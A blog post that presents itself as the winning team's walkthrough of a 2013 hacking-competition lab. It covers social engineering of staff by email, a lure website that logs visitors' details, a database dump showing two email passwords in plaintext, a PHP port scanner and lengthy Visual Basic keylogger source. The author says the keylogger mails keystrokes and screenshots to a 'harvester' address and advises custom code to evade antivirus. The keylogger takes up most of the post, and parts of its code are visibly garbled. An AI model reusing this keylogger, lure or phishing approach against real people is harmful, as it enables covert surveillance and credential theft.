what i do?

Am an Information Risk Consultant and Penetration Tester, i specialize mostly in penetrating secure networks/computer systems where i simulate an organized professional attack against your organization, where after that a detailed report with weakness and exploited vectors are summarized. This will help you gain control over your infrastructures security and maximize your protection.

Monday, March 31, 2014

HACKBATTLE 2013, BREAKING INTO JOAN WOKABIS LAPTOP



HACKBATTLE2013 TEAM OWNERZ INFO EXTRACT FROM DB AND EMAILS

Team 0wnErz extracting information from phpmyadmin and also from emails









HACKBATTLE 2013 FULL EMAIL RECON BY TEAM OWNERZ

 This is how Team OwnErz were able to initiate conversation with Joan and Daniella








HACKBATTLE 2013 EMAIL ACCESS FROM DATABASE SERVER

When you gain access to the DB server, the email configurations were stored there, mostly the Testers were supposed to get through the phpMyAdmin.


mysql> use emails;
Database changed
mysql> select * from both_emails;
+----------+----------+-----------+---------------------------+-----------------+
| PersonID | LastName | FirstName | email                     | password        |
+----------+----------+-----------+---------------------------+-----------------+
|        1 | wokabi   | joan      | joan.wokabi@gmail.com     | n@stys4l0nw3b   |
|        2 | daniella | wambuas   | daniell.wambuas@gmail.com | qwerty2014Nasty |
+----------+----------+-----------+---------------------------+-----------------+
2 rows in set (0.00 sec)

mysql>




TARGETTING AZANURU FOR MORE INFORMATION SOCIAL ENGINNERING, HACKBATTKE 2013

By Team 0wnErz, winners of Hackbattle 2013

Learning about the subnets and floating IPs

HACKBATTLE 2013 EMAIL SOCIAL ENGINEERING SNAPSHOTS



Targeting the users was the trick against the Lab

by TeamOwnErz

HACKBATTLE 2013 WALKTHROUGH BY THE WINNERS --TEAM OWN3RZ

HackBattle 2013 WalkThrough

Tutorial by Munir, Ruthie and Ibrahim


The Scenario

The Process

The Server looks well protected from the above scenario but it also shows evidence of workstations which are not behind the same firewall. This in the team 0wnErz case was the best target but how to get to them was the tricky bit.  

So the starting point was what we see i.e.
http://197.232.19.194

Looking at the site static html nothing fancy on it no php code therefore ruling out all possibility of SQL injections which is everyone’s juicy cake. Going for the forms, drat those mail too so no PHP form to post to .
The worst you get was directory listing and a failed adobe gallery scripts missing from the gallery page, damn those would have helped us read the logs as they need that access to work. So what now. Look at what the site has to offer.

Found 2 emails:

Joan.wokabi@gmail.com –Manager  (Home Page)
Daniella.wambuas@gmail.com – IT Staff Manager (About Us Page)

So basically for now we have 2 managers a business one and a techie one, so from here the push was for the business manager let’s see if she can help us.
So our First contact was to complain about the lack of user experience on the appointment page , nothing fancy just to see how she takes it and gauge our audience. This is how it went.

She replied and it’s apparent that she does care about user experience one thing noted though she copied daniella in the response who we found out is Daniel and the email was misspelled on the site.  So next a little bit of more getting to know about the where abouts but noticing there is a “database” where we have been recorded but where?? , nice!!!!!!.

A little bit more talk and she asks for more information about us and we gladly give our alias justifying our email too as to why it is not so personalized ;). On doing this and the rapport building up Joan mentions something important … she input us in the database and she has access to it, also from her email we can see that there’s an application to manage a database.


I don’t know about you but most people I know have :
phpMyAdmin
sqlbuddy

Let’s go with number one though , most common install directories for the system. Well long story short after a slow trial and error we found a /data directory. Cool I know right.  Progress Finally but now we need to tread carefully.
Now there are 2 things we can do:
try exploit the phpMyAdmin
try trap Joan and compromise Joan’s machine since she has access
We decided to try both but weigh our chances. So step one was view the phpMyAdmin

Also notice test.php well that’s phpinfo awesome wealth of information about the server:




Server root: /etc/apache2
webroot: /var/www/
User/Group www-data(33)/33
php version: 5.5.3-1ubuntu2.2
allow_url_fopen On
mysql: 5.5.35
internal IP: 192.168.200.2


Back to phpMyAdmin Well we are dealing with one revision from the latest version:

its 4.1.8.


What are the odds we will kill this thing and go free, well seeing the prompt tells you that no user goes in without a pass so we download the same version of phpmyAdmin and install it on our end now only one problem we create a valid login to a default db i.e. mysql however we can’t replay the 4 cookies, as we realized later is because the online one lacked mcrypt while we had it therefore our cookie pattern was quite different.

“God Blesses those who put errors on their homepage and this server wasn’t blessed it was cursed!!! ”

So lets go the Joan way first if she has access to this we shall know but we need to be smart about this so here is the breakdown of the needs.
Find Joan’s environment she must be one of the workstations , what’s she running , what’s her address etc.
Come up with a super trap and hook joan to it then get enough info to steal her credentials and login as her.

So for the first team 0wnErz went with make the competition so acquire a rogue domain first we we got (http://spa.oo3.co). We took a few days to just make a nice HTML site for a spa but added a bit of php code in two sections: the first took her information as she visited in the home page and wrote to a text file and incase she missed that we had another similar hook that mailed us the information when she submitted a form.
The information we needed most was :
IP
Full User Agent Information Including OS information to aid in performing our attack.

The Site:

The script on the homepage had this php added to it, it wrote to two files the first got a summary of just what we needed and the second everything incase there were extras:


So we talked to Joan to check it out ;)

and she did:


So she is on an XP and her IP is that as is on screen, Firefox 27 damn a lot of work here if we go for a browser attack but let’s check if the IP is for a router or Proxy or the actual machine. So we made a simple port scanner none noisy 
echo "####################################
\nTeam 0wnErz HB2013 PortScanner
\n ####################################

\n";
$host = "197.232.19.195";

$ports=array("21","22","23","25","53","80","110","143","139","389","443","587","1352","1433","3306","3389","5900","8080");
$arrlength=count($ports);

for($i=0;$i<$arrlength;$i++) {
$fp = fsockopen($host,$ports[$i],$errno,$errstr,10);
if($fp)
{
echo "port " . $ports[$i] . " open on " . $host ."
\n";
echo "
";
fclose($fp);
}
else
{
echo "port " . $ports[$i] . " closed on " . $host . "
\n";
echo "
";
}
flush();
}
?>

 
Anyway as you can see nothing fancy fsock is like telnet in PHP :D only we can do it from our webserver online or locally if it gets blacklisted easy to move to another server and continue but we didn’t,…. no noise :D

Rdesktop interesting is on this thing and http but rdesktop is important lets test it.

Windows Server 2003 WTF :D . 

Ok someone’s playing us so now part 2 of our attack needs to be smart we don’t have a very direct target.
 
Since we are dealing with an XP , user agent didn’t lie or rather we chose to believe that but either way we will need a windows payload , windows xp and server 2003 lack elevated desktop so binding some nice application to a keylogger should yield good results.  If you like commercially done keyloggers you can get things like redfox and ardamax etc limitless but nway save yourself the hustle and write some code signature based AV’s won’t have them most probably and keep it on simple logic not complex hooks those get flagged. 
Don’t get jealous ours does :
Screenshots and keys every ten minutes to our harvester email. And keys and apps keys have been trapped from we put our things together the simple way don’t download and run :D.

Note:
You need a harvester email preferably a Gmail one. Easiest to send to.
Here is a snippet from the logic of our keylogger in VB.

‘basic emailer include and simple system output
Imports System.IO
Imports System.Net.Mail
‘ yes if you are asking why the driver declares below its because we want to reduce dependencies and work with what windows already has.
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Declare Function RegisterServiceProcess Lib "Kernel32.dll" (ByVal dwProcessId As Integer, ByVal dwType As Integer) As Integer
Private Declare Function GetForegroundWindow Lib "user32.dll" () As Int32
Private Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hwnd As Int32, ByVal lpString As String, ByVal cch As Int32) As Int32
‘basic house cleaning for caps and shift key presses so that we accurately record letters as caps or not caps in our main keylogger
Public Function CAPSLOCKON() As Boolean
    If My.Computer.Keyboard.CapsLock = True Then
            Return True
        Else
            Return False
        End If
End Function
Dim mimiNiCapsAmaLa As Integer
Dim Shifter As Integer
‘Keylogger Engine- usually behind your timer ;) ours is a 10 minute space on the highest of our 3 timers and a textbox to pass your data through.
Shifter = GetAsyncKeyState(System.Windows.Forms.Keys.ShiftKey)

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.A)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "A"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "a"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.B)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "B"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "b"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.C)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "C"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "c"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "D"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "d"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.E)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "E"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "e"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "F"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "f"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.G)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "G"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "g"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.H)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "H"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "h"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.I)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "I"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "i"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.J)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "J"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "j"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.K)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "K"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "k"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.L)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "L"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "l"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.M)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "M"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "m"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.N)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "N"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "n"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.O)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "O"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "o"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.P)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "P"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "p"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Q)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "Q"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "q"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.R)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "R"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "r"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.S)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "S"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "s"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.T)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "T"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "t"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.U)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "U"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "u"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.V)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "V"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "v"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.W)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "W"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "w"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.X)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "X"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "x"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Y)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "Y"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "y"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Z)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "Z"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "z"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D1)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "1"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "!"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D2)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "2"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "@"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D3)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "3"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "#"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D4)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "4"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "$"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D5)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "5"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "%"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D6)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "6"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "^"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D7)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "7"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "&"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D8)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "8"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "*"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D9)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "9"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "("
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D0)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "0"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & ")"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Back)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[backspace]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Tab)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[tab]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Return)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & vbCrLf
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.ShiftKey)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[shift]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.ControlKey)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[ctrl]"
        End If

